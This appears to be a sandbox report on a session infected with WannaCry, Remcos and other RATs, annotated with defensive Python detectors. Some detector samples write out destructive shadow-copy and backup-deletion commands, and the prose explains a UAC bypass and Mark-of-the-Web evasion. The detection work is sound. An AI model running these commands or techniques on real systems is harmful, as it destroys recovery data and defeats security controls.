Analysis
- max time kernel: 700s
- max time network: 736s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-10-2024 15:41
- Static task: static1
- URLScan task: urlscan1
- Behavioral task: behavioral1 (Sample: https://bloxflip.com/a/kriszti; Resource: win10v2004-20240802-en)

General
- Target: https://bloxflip.com/a/kriszti
The submitted target is a referral URL opened in Edge. The signatures below are driven by executables that were downloaded and run during the session (a WannaCry-main archive on the Desktop, AnyDesk, Remcos, NetWire, RevengeRAT, Opaserv and a CrimsonRAT payload) rather than by the page load alone, so read them as the behaviour of those files, not of the URL.
Malware Config
- Extracted from C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]: family wannacry; Bitcoin address 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
- Extracted: family crimsonrat; C2 185.136.161.124
Signatures

CrimsonRAT main payload (1 IoC)
Crimson RAT is a remote-access trojan associated with a Pakistan-linked threat actor.
- YARA rule family_crimsonrat matched behavioral1/files/0x0008000000023351-5304.dat
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
- Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 5740) is not expected to spawn rundll32.exe (PID 3576); procid_target 260. The same rundll32.exe PID appears under "Blocklisted process makes network request" below (flow 431).
RevengeRAT
Remote-access trojan with a wide range of capabilities.
- reg.exe set \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (int), three separate times
Setting EnableLUA to 0 switches User Account Control off for every account from the next logon, so later elevations happen without a consent prompt. Writing that value needs an elevated reg.exe, so it also tells you the sample already held administrative rights when it ran.
WannaCry
WannaCry is a ransomware cryptoworm.

Deletes shadow copies (3 TTPs)
Ransomware deletes Volume Shadow Copy snapshots and other recovery data so that encrypted files cannot be restored locally. The WMIC.exe and vssvc.exe privilege use listed under "Suspicious use of AdjustPrivilegeToken" below is consistent with this signature.
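The report lists the signature but not the command lines that triggered it. The following Python is an added example, not part of the sandbox report, of how a detection pipeline matches recovery-inhibition commands in process-creation events. The event rows are constructed (the first reproduces the well-known WannaCry chain of vssadmin, wmic, bcdedit and wbadmin); the rule set, the cmd.exe-wrapper handling and the PowerShell pipeline special case are this example's own assumptions:

```python
"""Flag recovery-inhibition commands (shadow-copy deletion, boot-recovery
disabling, backup-catalog removal) in process-creation command lines.

Added example for the "Deletes shadow copies" signature; it is not part of
the sandbox report. The report does not show the command lines the samples
ran, so the EVENTS rows below are constructed; the first reproduces the
classic WannaCry recovery-inhibition chain.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    command: str      # the individual command that matched
    technique: str


# (executable basename, argument pattern, label); matched case-insensitively
# on one command at a time, so "vssadmin list shadows" does not fire.
RULES = [
    (r"vssadmin(\.exe)?", r"\bdelete\s+shadows\b",
     "shadow copies deleted (vssadmin)"),
    (r"vssadmin(\.exe)?", r"\bresize\s+shadowstorage\b.*/maxsize=",
     "shadow storage shrunk to evict copies (vssadmin)"),
    (r"wmic(\.exe)?", r"\bshadowcopy\b.*\bdelete\b",
     "shadow copies deleted (WMIC)"),
    (r"(powershell|pwsh)(\.exe)?",
     r"win32_shadowcopy.*(\bremove-wmiobject\b|\bremove-ciminstance\b|\.delete\(\))",
     "shadow copies deleted (PowerShell WMI)"),
    (r"bcdedit(\.exe)?", r"\brecoveryenabled\s+no\b",
     "Windows Recovery Environment disabled (bcdedit)"),
    (r"bcdedit(\.exe)?", r"\bbootstatuspolicy\s+ignoreallfailures\b",
     "boot-failure recovery suppressed (bcdedit)"),
    (r"wbadmin(\.exe)?", r"\bdelete\s+(catalog|systemstatebackup)\b",
     "backup catalog deleted (wbadmin)"),
]

# 'cmd.exe /c <chain>' or 'cmd /d /c "<chain>"'  ->  <chain>
CMD_WRAPPER = re.compile(
    r'^\s*"?(?:[^"\s]*[\\/])?cmd(?:\.exe)?"?\s+(?:/\S+\s+)*?/[ck]\s+(.*)$', re.I)
# cmd.exe chain separators; quotes are not honoured, which can over-split a
# quoted path containing '&' but cannot hide a hit.
CHAIN_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


def _strip_cmd_wrapper(cmdline):
    m = CMD_WRAPPER.match(cmdline)
    if not m:
        return cmdline.strip()
    inner = m.group(1).strip()
    if len(inner) >= 2 and inner[0] == inner[-1] == '"':
        inner = inner[1:-1]
    return inner


def _exe_name(command):
    """Basename of the first token, quotes removed, lower-cased."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        first = cmd[1:end] if end > 0 else cmd[1:]
    else:
        first = cmd.split(None, 1)[0]
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_event(pid, image, cmdline):
    """Return the Findings for one process-creation event."""
    line = _strip_cmd_wrapper(cmdline)
    if not line:
        return []
    # A PowerShell pipeline is one command; a cmd.exe chain is several.
    if _exe_name(line).startswith(("powershell", "pwsh")):
        commands = [line]
    else:
        commands = [c for c in CHAIN_SPLIT.split(line) if c.strip()]
    findings = []
    for cmd in commands:
        exe = _exe_name(cmd)
        for exe_re, arg_re, label in RULES:
            if re.fullmatch(exe_re, exe) and re.search(arg_re, cmd.lower()):
                findings.append(Finding(pid, image, cmd.strip(), label))
    return findings


def scan_events(events):
    return [f for ev in events for f in scan_event(*ev)]


# Constructed sample events: (pid, image, command line).
EVENTS = [
    (5616, "cmd.exe",
     "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
     "bcdedit /set {default} bootstatuspolicy ignoreallfailures & "
     "bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"),
    (7001, "powershell.exe",
     'powershell.exe -nop -w hidden -c "Get-WmiObject Win32_Shadowcopy | '
     'ForEach-Object { $_.Delete() }"'),
    (7002, "vssadmin.exe", '"C:\\Windows\\System32\\vssadmin.exe" list shadows'),
    (7003, "wmic.exe", "wmic shadowcopy list brief"),
]

if __name__ == "__main__":
    for f in scan_events(EVENTS):
        print(f"pid {f.pid:<5} {f.image:<15} {f.technique}: {f.command}")
```

The chain is split into its individual commands before matching so that each hit is reported with the exact command that caused it; the two read-only controls (vssadmin list, wmic shadowcopy list) produce nothing.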
RevengeRat executable (1 IoC)
- YARA rule revengerat matched behavioral1/files/0x0008000000000705-6879.dat

Blocklisted process makes network request (1 IoC)
- rundll32.exe (PID 3576), flow 431

Downloads MZ/PE file
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
- AnyDesk.exe queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation (twice)
Caveat: AnyDesk is a legitimate remote-access tool and reads this value for localisation, so on its own the query is weak evidence of geofencing. The question worth answering is which sample installed and started AnyDesk during the session.
Drops startup file (2 IoCs)
- WannaCry.EXE opened C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7BCD.tmp for modification
- WannaCry.EXE opened C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7BD4.tmp for modification

Executes dropped EXE (35 IoCs)
PIDs per image, in order of first appearance:
- AnyDesk.exe: 1476, 1832, 4548, 1592, 220
- taskdl.exe: 4772, 4732, 3280, 212, 4020, 4512, 1892, 3576, 5292
- @[email protected]: 5340, 3828, 1244, 3244, 3736, 2708, 772, 2768, 3908, 5932
- taskhsvc.exe: 4084
- taskse.exe: 4512, 5328, 6128, 992, 5912, 5936, 5204, 5300
- Userdata.exe: 1408
- dlrarhsiva.exe: 940
Note the PID reuse within the run: 4512 is first a taskse.exe and later a taskdl.exe, and 3576 is a taskdl.exe here but the rundll32.exe of the child-process signature above, so a PID alone does not identify a process in this report.

Loads dropped DLL (9 IoCs)
- AnyDesk.exe: 1592, 4548
- taskhsvc.exe: 4084 (seven loads). taskhsvc.exe is the Tor client WannaCry drops to reach its hidden-service C2, which is why it loads several bundled DLLs.
Modifies file permissions (1 TTP, 1 IoC)

Uses the VBS compiler for execution (1 TTP)

Abuse Elevation Control Mechanism: Bypass User Account Control (1 TTP, 1 IoC)
UAC bypass attempt via the SilentCleanup scheduled task. That task runs with highest privileges for the logged-on user and resolves its executable path through the user-controllable %windir% environment variable, so an attacker who repoints %windir% in HKCU\Environment and starts the task gets their own binary run elevated without a prompt. The reg.exe and schtasks.exe activity under "Modifies registry key" and "Scheduled Task/Job" below is where to look for the concrete commands.
Adds Run key to start application (2 TTPs, 17 IoCs)
HKU\<SID> below stands for \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000; the HKLM\SOFTWARE\WOW6432Node keys are the 32-bit view of the same autostart locations. Backslashes are shown un-escaped.
- Remcos.exe: HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "C:\Windows\SysWOW64\Userdata\Userdata.exe"
- Userdata.exe: HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "C:\Windows\SysWOW64\Userdata\Userdata.exe" (the dropped copy re-asserts the same value)
- reg.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oefimrcpcbg941 = "C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe" (WannaCry's randomly named persistence entry)
- Opaserv.l.exe: HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsrv = c:\windows\system\winsrv.exe (twice)
- Opaserv.l.exe: HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRTDLL = C:\WINDOWS\CRTDLL.EXE
- Opaserv.l.exe: HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRYPTDLL = C:\WINDOWS\CRYPTDLL.EXE
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\scr = c:\windows\system\scr.scr (twice)
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\COLORUI = C:\WINDOWS\COLORUI.EXE
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MPREXE = C:\WINDOWS\MPREXE.EXE (twice)
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CMUTIL = C:\WINDOWS\CMUTIL.EXE
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\LoadManager = c:\windows\system\msload.exe (twice)
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\DDOIPROXY = C:\WINDOWS\DDOIPROXY.EXE
- Opaserv.l.exe: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\DDORES = C:\WINDOWS\DDORES.EXE
Caveat: RunServices is a Windows 9x autostart key that NT-based Windows never processes, so the four RunServices entries are inert on this Windows 10 image. The Run entries, including the Remcos and WannaCry ones, do fire at logon.

File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTP)
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 5 IoCs)
- flows 337, 338: camo.githubusercontent.com
- flow 415: 0.tcp.ngrok.io
- flows 463, 464: drive.google.com
Caveat: camo.githubusercontent.com is GitHub's image proxy and is contacted whenever a README is rendered, and drive.google.com serves ordinary downloads as well. The ngrok tunnel endpoint is the flow most likely to be a RAT's C2 and the one to pivot on; ngrok hostnames are short-lived, so record the flow's destination IP and port along with the name.

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flows 60, 64: api.ipify.org
Drops file in System32 directory (20 IoCs)
- Remcos.exe created C:\Windows\SysWOW64\Userdata\Userdata.exe and opened C:\Windows\SysWOW64\Userdata and C:\Windows\SysWOW64\Userdata\Userdata.exe for modification (the Run-key target above)
- iexplore.exe created and then modified C:\Windows\SysWOW64\remcos\logs.dat; this is the Remcos keystroke log, written by the iexplore.exe instance that Userdata.exe hollowed (see "Suspicious use of SetThreadContext")
- AnyDesk.exe opened 15 Explorer icon-cache files under C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ for modification (iconcache_16, _32, _48, _96, _256, _768, _1280, _1920, _2560, _wide, _wide_alternate, _sr, _idx, _exif and _custom_stream .db); these are shell housekeeping writes from a process running under the SYSTEM profile and are not suspicious by themselves
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
- WannaCry.EXE set \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\Users\Admin\Desktop\@[email protected]"
- @[email protected] set the same value again
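The registry rows above (EnableLUA=0 under RevengeRAT, the Run/RunServices entries, and the wallpaper value) are the kind an analyst scores by hand. The following is an added example, not code from the report or from any of the samples: a Python triage pass over Set-value events that normalises the native key paths the sandbox logs, extracts the autostart target and assigns a severity. The rows are re-typed from the report's own tables plus one constructed OneDrive row; the severity rules and the trusted-directory list are this example's assumptions:

```python
"""Triage registry Set-value events for autostart persistence (Run /
RunServices), UAC tampering (EnableLUA=0) and ransom-note wallpaper.

Added example; it is not part of the sandbox report. The EVENTS rows are
re-typed from the report's own IoC tables (escaped backslashes collapsed,
the @[email protected] file name kept as the report prints it), plus one
constructed benign row (OneDrive) to show the severity split.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    process: str
    key: str        # hive-normalised key path
    name: str
    target: str     # file path extracted from the value
    label: str
    severity: str   # high / medium / info


SEVERITY_RANK = {"high": 0, "medium": 1, "info": 2}
USER_SID = re.compile(r"^\\REGISTRY\\USER\\(S-1-5-21-[\d-]+)", re.I)


def normalize_key(key):
    """Map the native path the sandbox logs to HKLM / HKU\\<sid> and drop
    the WOW6432Node redirection so 32- and 64-bit writers compare equal."""
    k = re.sub(r"^\\REGISTRY\\MACHINE", "HKLM", key, flags=re.I)
    k = USER_SID.sub(r"HKU\\\1", k)
    return re.sub(r"\\WOW6432Node(?=\\)", "", k, flags=re.I)


def extract_path(value):
    """First token of a command-line-style value, surrounding quotes removed."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end] if end > 0 else v[1:]
    return v.split(None, 1)[0] if v else ""


def _odd_location(path):
    """True unless the target sits where installed software normally lives.
    A new sub-directory under System32/SysWOW64 (Remcos' 'Userdata') counts
    as odd; a file dropped straight into C:\\Windows or onto the Desktop does
    too. Assumption of this example, not a Windows rule."""
    p = path.lower()
    if p.startswith(("c:\\program files\\", "c:\\program files (x86)\\")):
        return False
    for d in ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\"):
        if p.startswith(d):
            return "\\" in p[len(d):]
    return True


def classify(process, key, name, value):
    """Return a Finding for one Set-value event, or None if uninteresting."""
    k = normalize_key(key)
    kl = k.lower()
    leaf = kl.rsplit("\\", 1)[-1]
    n = name.lower()
    if kl.endswith("\\policies\\system") and n == "enablelua" and value.strip('"') == "0":
        return Finding(process, k, name, value,
                       "UAC disabled: EnableLUA=0 (effective at next logon)", "high")
    if leaf in ("run", "runonce"):
        target = extract_path(value)
        sev = "high" if _odd_location(target) else "medium"
        return Finding(process, k, name, target, f"autostart via {leaf.capitalize()} key", sev)
    if leaf == "runservices":
        return Finding(process, k, name, extract_path(value),
                       "RunServices autostart (Windows 9x key, ignored on Windows 10)", "info")
    if kl.endswith("\\control panel\\desktop") and n == "wallpaper":
        return Finding(process, k, name, extract_path(value),
                       "desktop wallpaper replaced (ransom note)", "medium")
    return None


def triage(events):
    """Classify every (process, key, name, value) row; worst severity first."""
    found = [f for f in (classify(*e) for e in events) if f is not None]
    found.sort(key=lambda f: SEVERITY_RANK[f.severity])
    return found


SID = "S-1-5-21-945322488-2060912225-3527527000-1000"
HKU = "\\REGISTRY\\USER\\" + SID
HKLM = "\\REGISTRY\\MACHINE"
EVENTS = [
    ("reg.exe", HKLM + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
     "EnableLUA", "0"),
    ("Remcos.exe", HKU + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "remcos", '"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe"'),
    ("reg.exe", HKLM + "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
     "oefimrcpcbg941", '"C:\\Users\\Admin\\Desktop\\WannaCry-main\\WannaCry-main\\tasksche.exe"'),
    ("Opaserv.l.exe", HKLM + "\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServices",
     "LoadManager", "c:\\windows\\system\\msload.exe"),
    ("Opaserv.l.exe", HKU + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "CRTDLL", "C:\\WINDOWS\\CRTDLL.EXE"),
    ("WannaCry.EXE", HKU + "\\Control Panel\\Desktop",
     "Wallpaper", "C:\\Users\\Admin\\Desktop\\@[email protected]"),
    # constructed benign control row, not from the report
    ("OneDriveSetup.exe", HKU + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "OneDrive", '"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.severity:<6}] {f.process:<14} {f.key}\\{f.name} -> {f.target}  ({f.label})")
```

Stripping WOW6432Node before comparison matters in practice: the 32-bit Opaserv and the WannaCry reg.exe write the redirected view, and a rule keyed on the literal 64-bit path would miss them.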
Suspicious use of SetThreadContext (3 IoCs)
- RevengeRAT.exe (PID 5524) set the thread context of PID 5964 (RegSvcs.exe); procid_target 235
- RegSvcs.exe (PID 5964) set the thread context of PID 5544; procid_target 236 (the target image is not named in the report)
- Userdata.exe (PID 1408) set the thread context of PID 5320 (iexplore.exe, per the SetWindowsHookEx list below); procid_target 251
Setting the thread context of another process is how process hollowing redirects execution: the RAT starts a legitimate signed binary suspended, replaces its image, points the main thread at the new entry point and resumes it. RegSvcs.exe, a .NET Framework utility, is a common host for .NET RATs such as RevengeRAT; Remcos (Userdata.exe) hollowed iexplore.exe, and it is that iexplore.exe which then writes logs.dat and installs a Windows hook.

YARA rule upx (2 IoCs)
- behavioral1/memory/7044-6373-0x0000000000400000-0x0000000000438000-memory.dmp
- behavioral1/memory/7044-6890-0x0000000000400000-0x0000000000438000-memory.dmp
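Added example, not from the report: the two process-relationship signatures, WINWORD.EXE spawning rundll32.exe and the SetThreadContext chains, expressed as one graph analysis in Python. The spawn and SetThreadContext rows are re-typed from the report's tables; the explorer.exe parent rows are constructed so the ancestry walk has a root, the image of PID 5544 is left as "?" because the report does not name it, and the LOLBin and hollowing-host lists are assumptions of this example:

```python
"""Build a process-relationship graph from sandbox events and flag
(a) Office applications spawning script/LOLBin hosts and
(b) SetThreadContext on another process, the tell-tale of hollowing,
reported as complete injection chains.

Added example; it is not part of the sandbox report. The spawn and
SetThreadContext rows are re-typed from the report's tables; the
explorer.exe rows are constructed, and PID 5544's image is "?" because
the report does not name it.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass
class Proc:
    pid: int
    image: str
    parent: Optional[int] = None


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "msiexec.exe",
           "bitsadmin.exe"}
# Signed Microsoft binaries that .NET RATs and Remcos routinely hollow
# (assumed list for this example).
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
                "aspnet_compiler.exe", "vbc.exe", "iexplore.exe", "svchost.exe",
                "explorer.exe"}


def build(events):
    """events: (kind, actor_pid, actor_image, target_pid, target_image) with
    kind 'spawn' (actor is the parent) or 'set_thread_context' (actor
    injected into target). PIDs are treated as unique, which holds for these
    rows; a production pipeline keys on (pid, creation time) because the
    report itself shows PID reuse (3576, 4512)."""
    procs = {}
    injections = defaultdict(list)
    for kind, apid, aimg, tpid, timg in events:
        procs.setdefault(apid, Proc(apid, aimg))
        procs.setdefault(tpid, Proc(tpid, timg))
        if kind == "spawn":
            procs[tpid].parent = apid
        elif kind == "set_thread_context":
            injections[apid].append(tpid)
        else:
            raise ValueError(f"unknown event kind {kind!r}")
    return procs, injections


def ancestry(procs, pid):
    """Images from pid up to the root, child first."""
    chain, seen = [], set()
    while pid is not None and pid in procs and pid not in seen:
        seen.add(pid)                      # guards against cycles from PID reuse
        chain.append(procs[pid].image)
        pid = procs[pid].parent
    return chain


def office_spawns(procs):
    """(parent_image, parent_pid, child_image, child_pid, ancestry) for every
    Office process that started a LOLBin."""
    hits = []
    for p in procs.values():
        if p.parent is None or p.parent not in procs:
            continue
        parent = procs[p.parent]
        if parent.image.lower() in OFFICE and p.image.lower() in LOLBINS:
            hits.append((parent.image, parent.pid, p.image, p.pid, ancestry(procs, p.pid)))
    return hits


def injection_chains(procs, injections):
    """Follow SetThreadContext edges starting from processes nobody injected into."""
    targets = {t for ts in injections.values() for t in ts}
    chains = []

    def walk(pid, path):
        nxt = injections.get(pid, [])
        if not nxt:
            chains.append(path)
            return
        for t in nxt:
            walk(t, path + [f"{t} {procs[t].image}"])

    for root in injections:
        if root not in targets:
            walk(root, [f"{root} {procs[root].image}"])
    return chains


def report(events):
    procs, injections = build(events)
    chains = injection_chains(procs, injections)
    # Every hop after the first that lands in a signed Microsoft host is a hollowed process.
    hollowed = [hop for c in chains for hop in c[1:]
                if hop.split(" ", 1)[1].lower() in HOLLOW_HOSTS]
    return {"office_spawns": office_spawns(procs),
            "injection_chains": chains,
            "hollowed_hosts": hollowed}


EVENTS = [
    ("spawn", 4400, "explorer.exe", 5740, "WINWORD.EXE"),                 # constructed
    ("spawn", 5740, "WINWORD.EXE", 3576, "rundll32.exe"),                  # report
    ("spawn", 4400, "explorer.exe", 3060, "msedge.exe"),                   # constructed
    ("spawn", 3060, "msedge.exe", 3196, "msedge.exe"),                     # report
    ("set_thread_context", 5524, "RevengeRAT.exe", 5964, "RegSvcs.exe"),   # report
    ("set_thread_context", 5964, "RegSvcs.exe", 5544, "?"),                # report
    ("set_thread_context", 1408, "Userdata.exe", 5320, "iexplore.exe"),    # report
]

if __name__ == "__main__":
    r = report(EVENTS)
    for parent, ppid, child, cpid, anc in r["office_spawns"]:
        print(f"{parent} ({ppid}) spawned {child} ({cpid}); ancestry: {' <- '.join(anc)}")
    for chain in r["injection_chains"]:
        print("injection chain:", " -> ".join(chain))
    for hop in r["hollowed_hosts"]:
        print("hollowed host:", hop)
```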
Drops file in Windows directory (26 IoCs)
All by Opaserv.l.exe; each file is created and then opened for modification (event counts in parentheses):
- c:\windows\system\msload.exe (3)
- c:\windows\system\scr.scr (3)
- c:\windows\system\winsrv.exe (3)
- C:\WINDOWS\MPREXE.EXE (5; two of the modifications go through the native path \??\c:\windows\MPREXE.EXE)
- C:\WINDOWS\COLORUI.EXE (2)
- C:\WINDOWS\CMUTIL.EXE (2)
- C:\WINDOWS\CRTDLL.EXE (2)
- C:\WINDOWS\CRYPTDLL.EXE (2)
- C:\WINDOWS\DDOIPROXY.EXE (2)
- C:\WINDOWS\DDORES.EXE (2)
These are the Run/RunServices targets listed above. c:\windows\system is a legacy directory that is normally almost empty on Windows 10, so executables appearing there are an indicator in their own right.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 64 IoCs)
Attempts to gather information about the victim's system language in order to infer the geographical location of that host.
Every entry is an open of \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; counts per process:
- taskse.exe (8), @[email protected] (8), NET.exe (8), cmd.exe (7), taskdl.exe (6), AnyDesk.exe (5), net1.exe (4), reg.exe (3), attrib.exe (2), Opaserv.l.exe (2), RegSvcs.exe (2), and one each for Userdata.exe, taskhsvc.exe, WMIC.exe, cscript.exe, iexplore.exe, NetWire.exe, icacls.exe, Remcos.exe and WannaCry.EXE
Caveat: this key is read during locale initialisation by practically every Windows process, so the signature is noise as a detection. Its value here is the inventory: it is the only place in the report where NetWire.exe and icacls.exe appear, and it shows net.exe/net1.exe, WMIC.exe, cscript.exe and attrib.exe running during the session.

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
Adversaries may check for Internet connectivity on compromised systems (see "Runs ping.exe" below).
Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
- AnyDesk.exe: opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 and queried ProcessorNameString
- WINWORD.EXE: opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (twice) and queried ~MHz (twice) and ProcessorNameString (twice)
Caveat: both are legitimate applications and this is normal start-up behaviour for them; the signature is informational here.

Enumerates system info in registry (2 TTPs, 9 IoCs)
- WINWORD.EXE: opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS (twice) and queried SystemSKU (twice) and SystemFamily (twice)
- msedge.exe: opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS and queried SystemManufacturer and SystemProductName
Same caveat: browser and Office behaviour, not sample behaviour.

Kills process with taskkill (1 IoC)
- taskkill.exe (PID 7272)

Modifies registry key (1 TTP, 7 IoCs)
- reg.exe PIDs 5164, 3240, 2512, 3244, 692, 6728, 7620
NTFS ADS (1 IoC)
- msedge.exe opened C:\Users\Admin\Downloads\Unconfirmed 241313.crdownload:SmartScreen for modification
This is Edge writing its SmartScreen alternate data stream on an in-progress download, the same mechanism by which browsers attach the Mark-of-the-Web (the Zone.Identifier stream) to files fetched from the Internet. It is benign in itself; its forensic value is that it dates the download, and once the file is renamed from .crdownload its Zone.Identifier stream records the zone and, for Chromium-based browsers, the referrer and host URL.
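Added example, not from the report: parsing the Zone.Identifier stream a browser leaves on a finished download, in Python. The stream body and URLs are constructed; read_mark shows the "<path>:Zone.Identifier" open that works on NTFS and returns None on a file without the stream or on a filesystem without streams.

```python
"""Read and interpret the Mark-of-the-Web (Zone.Identifier) alternate data
stream that browsers write beside downloaded files.

Added example; it is not part of the sandbox report, which only records
msedge.exe writing a ':SmartScreen' stream to the in-progress download.
The stream contents and URLs below are constructed for illustration.
"""
import configparser
from dataclasses import dataclass
from typing import Optional

ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


@dataclass(frozen=True)
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str]   # written by Chromium-based browsers
    host_url: Optional[str]       # the URL the bytes actually came from

    @property
    def zone_name(self):
        return ZONE_NAMES.get(self.zone_id, f"Unknown ({self.zone_id})")

    @property
    def from_internet(self):
        """Zones 3 and 4 are what SmartScreen, Office Protected View and
        the Attachment Execution Service key their checks on."""
        return self.zone_id >= 3


def parse_zone_identifier(text):
    """Parse the INI-style stream body:
        [ZoneTransfer]
        ZoneId=3
        ReferrerUrl=...
        HostUrl=...
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("stream has no [ZoneTransfer] section")
    sec = cp["ZoneTransfer"]
    return MarkOfTheWeb(zone_id=int(sec.get("ZoneId", "0")),
                        referrer_url=sec.get("ReferrerUrl") or None,
                        host_url=sec.get("HostUrl") or None)


def read_mark(path):
    """MOTW for a file on disk, or None when it carries no Zone.Identifier
    stream. Only NTFS on Windows has such streams; elsewhere the open of
    '<path>:Zone.Identifier' simply fails and None is returned."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8-sig", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


# Constructed stream body in the form Chromium browsers (Edge, Chrome) write.
SAMPLE_STREAM = ("[ZoneTransfer]\r\n"
                 "ZoneId=3\r\n"
                 "ReferrerUrl=https://example.com/some-page\r\n"
                 "HostUrl=https://cdn.example.com/files/archive.zip\r\n")

if __name__ == "__main__":
    m = parse_zone_identifier(SAMPLE_STREAM)
    print(f"zone {m.zone_id} ({m.zone_name}); from internet: {m.from_internet}")
    print("host:", m.host_url, "referrer:", m.referrer_url)
```

On a live Windows system the same stream can be listed with `Get-Item -Path <file> -Stream *` or `dir /r`; deleting it (or extracting the archive with a tool that does not propagate it) is exactly what lets a downloaded executable run without the SmartScreen and Protected View checks.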
Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- schtasks.exe PIDs 7472, 7232
Suspicious behavior: AddClipboardFormatListener (4 IoCs)
- AnyDesk.exe 1592; WINWORD.EXE 1936 (twice), 5740

Suspicious behavior: EnumeratesProcesses (64 IoCs)
- msedge.exe 3196, 3060, 5476, 5328, 2676, 5272, 460, 3596; identity_helper.exe 3224; AnyDesk.exe 4548; taskhsvc.exe 4084; Opaserv.l.exe 7952 (34 of the 64 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- AnyDesk.exe 220

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (49 IoCs)
- msedge.exe 3060 (all 49 entries). This is the browser applying its own process-mitigation policy that blocks non-Microsoft DLLs in its child processes, not malicious behaviour.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
- AUDIODG.EXE 5668: privilege 33, SeIncBasePriorityPrivilege (normal for the audio engine)
